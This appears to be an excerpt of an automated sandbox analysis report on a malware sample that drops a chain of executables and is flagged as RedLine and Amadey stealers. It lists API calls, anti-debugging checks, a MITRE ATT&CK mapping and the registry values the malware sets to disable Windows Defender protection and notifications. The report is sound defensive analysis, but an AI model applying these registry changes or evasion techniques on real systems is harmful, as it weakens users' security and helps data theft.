Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0041C50E push cs; iretd	9_2_0041C4E2
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_004231C8 push eax; ret	9_2_00423179
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0040E21D push ecx; ret	9_2_0040E230
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0041C6BE push ebx; ret	9_2_0041C6BF
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DBC125 push ebx; ret	9_2_02DBC126
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DBBE73 push cs; iretd	9_2_02DBBF49
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DBBF75 push cs; iretd	9_2_02DBBF49
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DAE484 push ecx; ret	9_2_02DAE497

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00402F1D

Source: en239906.exe.1.dr

Static PE information: 0xEFAF45DE [Wed Jun 5 03:28:30 2097 UTC]

Source: initial sample	Static PE information: section name: .text entropy: 7.985785026742163
Source: initial sample	Static PE information: section name: .text entropy: 7.769697619291595
Source: initial sample	Static PE information: section name: .text entropy: 7.747055941352255

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	File created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	File created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	File created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	File created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Jump to dropped file

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00401AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	0_2_00401AE8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	1_2_008E1AE8
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E51AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	2_2_00E51AE8
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,	3_2_010D1AE8

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe TID: 484	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe TID: 2356	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	Jump to dropped file
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_2-2449
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_1-2575
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_3-2575
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-2817

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_00405467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00405467

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00402390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00402390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_008E2390
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E52390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	2_2_00E52390
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_010D2390

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

9_2_0040CE09

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

9_2_004019F0

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_00402F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00402F1D

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

Code function: 9_2_0040ADB0 GetProcessHeap,HeapFree,

9_2_0040ADB0

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_068800A3 push dword ptr fs:[00000030h]	0_2_068800A3
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA092B mov eax, dword ptr fs:[00000030h]	9_2_02DA092B
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DA0D90 mov eax, dword ptr fs:[00000030h]	9_2_02DA0D90

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00406F40 SetUnhandledExceptionFilter,	0_2_00406F40
Source: C:\Users\user\Desktop\SzznpUhIjo.exe	Code function: 0_2_00406CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00406CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E6F40 SetUnhandledExceptionFilter,	1_2_008E6F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	Code function: 1_2_008E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_008E6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E56F40 SetUnhandledExceptionFilter,	2_2_00E56F40
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	Code function: 2_2_00E56CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00E56CF0
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D6F40 SetUnhandledExceptionFilter,	3_2_010D6F40
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	Code function: 3_2_010D6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_010D6CF0
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040E61C
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00416F6A
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_004123F1 SetUnhandledExceptionFilter,	9_2_004123F1
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DAE883 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_02DAE883
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DAD070 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_02DAD070
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DB71D1 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_02DB71D1
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: 9_2_02DB2658 SetUnhandledExceptionFilter,	9_2_02DB2658

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_004017EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_004017EE

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: GetLocaleInfoA,		9_2_00417A20
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	Code function: GetLocaleInfoA,		9_2_02DB7C87

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_00407155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00407155

Source: C:\Users\user\Desktop\SzznpUhIjo.exe

Code function: 0_2_00402BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,

0_2_00402BFB

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Code function: 4_2_00007FFBACD2077D GetUserNameA,

4_2_00007FFBACD2077D

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender real time protection (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection DisableIOAVProtection 1

Jump to behavior

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Jump to behavior

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.con1165.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.con1165.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.con1165.exe.2da0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino5628.exe.4776220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino5628.exe.4776220.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.con1165.exe.4510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 0.3.SzznpUhIjo.exe.6f54a20.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.SzznpUhIjo.exe.6f54a20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.255438944.0000000006E80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe, type: DROPPED

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: 9.2.con1165.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.con1165.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.con1165.exe.2da0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino5628.exe.4776220.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.kino5628.exe.4776220.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.3.con1165.exe.4510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.316570894.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.291817431.0000000004510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.316168321.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.256675819.00000000046C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	3 Native API	1 Windows Service	2 Bypass User Access Control	21 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	1 Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Service Execution	Logon Script (Windows)	1 Windows Service	3 Obfuscated Files or Information	Security Account Manager	1 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	1 Process Injection	22 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	13 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	2 Bypass User Access Control	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	21 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Access Token Manipulation	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Process Injection	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Rundll32	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SzznpUhIjo.exe	44%	ReversingLabs	Win32.Trojan.Pwsx
SzznpUhIjo.exe	49%	Virustotal		Browse
SzznpUhIjo.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	100%	Avira	HEUR/AGEN.1252166
C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino6423.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1165.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus7600.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino4801.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP002.TMP\dNT35s70.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	63%	ReversingLabs	Win32.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge280443.exe	80%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	68%	ReversingLabs	Win32.Trojan.Plugx
C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino5628.exe	65%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	88%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\IXP001.TMP\en239906.exe	80%	Virustotal		Browse
